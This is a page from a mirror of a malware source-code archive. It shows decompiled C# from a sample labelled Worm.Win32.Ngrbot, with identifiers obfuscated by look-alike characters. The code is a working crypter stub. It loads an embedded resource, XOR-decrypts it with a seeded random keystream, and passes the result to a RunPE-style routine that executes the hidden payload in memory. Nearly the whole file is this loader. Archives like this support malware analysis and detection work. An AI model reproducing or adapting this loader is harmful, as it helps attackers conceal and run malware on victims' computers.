mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
54 lines
2.7 KiB
C#
54 lines
2.7 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: ƀƚąƫcħ.Module1
|
|||
|
|
// Assembly: NoStartUp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: 14163617-1CB3-4844-9F67-2DC4A344E71C
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.exe
|
|||
|
|
|
|||
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
|
using System;
|
|||
|
|
using System.Diagnostics;
|
|||
|
|
using System.Runtime.InteropServices;
|
|||
|
|
|
|||
|
|
namespace ƀƚąƫcħ
|
|||
|
|
{
|
|||
|
|
[StandardModule]
|
|||
|
|
internal sealed class Module1
|
|||
|
|
{
|
|||
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|||
|
|
private static extern IntPtr FindResource(IntPtr ħМøƋυƪȝ, string ƪƥŊąɱȝ, string ƪƥƬƴƥȝ);
|
|||
|
|
|
|||
|
|
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
|
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
|
|||
|
|
|
|||
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
|
private static extern IntPtr LoadResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
|
|||
|
|
|
|||
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
|
private static extern int SizeofResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
|
|||
|
|
|
|||
|
|
[DllImport("kernel32", EntryPoint = "CopyFileA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
|
private static extern long CopyFile([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpExistingFileName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpNewFileName);
|
|||
|
|
|
|||
|
|
[STAThread]
|
|||
|
|
public static void main()
|
|||
|
|
{
|
|||
|
|
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
|
|||
|
|
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
|
|||
|
|
IntPtr resource = Module1.FindResource(moduleHandle, "0", "RT_RCDATA");
|
|||
|
|
IntPtr source = Module1.LoadResource(moduleHandle, resource);
|
|||
|
|
int length = Module1.SizeofResource(moduleHandle, resource);
|
|||
|
|
byte[] numArray = new byte[length - 1 + 1 - 1 + 1];
|
|||
|
|
Marshal.Copy(source, numArray, 0, length);
|
|||
|
|
int int32_1 = BitConverter.ToInt32(numArray, Convert.ToInt32(numArray.Length - 4));
|
|||
|
|
byte[] Ƌąƫą = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[numArray.Length - 3 + 1 - 1 + 1]);
|
|||
|
|
Random random = new Random(int32_1);
|
|||
|
|
byte[] buffer = new byte[Ƌąƫą.Length - 1 + 1 - 1 + 1];
|
|||
|
|
random.NextBytes(buffer);
|
|||
|
|
int int32_2 = Convert.ToInt32(Ƌąƫą.Length - 1);
|
|||
|
|
for (int index = 0; index <= int32_2; ++index)
|
|||
|
|
Ƌąƫą[index] = Convert.ToByte((byte) ((int) Ƌąƫą[index] ^ (int) buffer[index]));
|
|||
|
|
Ʀυŋƥȝƪąƨƨ.ƦυŋƥȝƧυƀ(Ƌąƫą, Process.GetCurrentProcess().MainModule.ModuleName);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|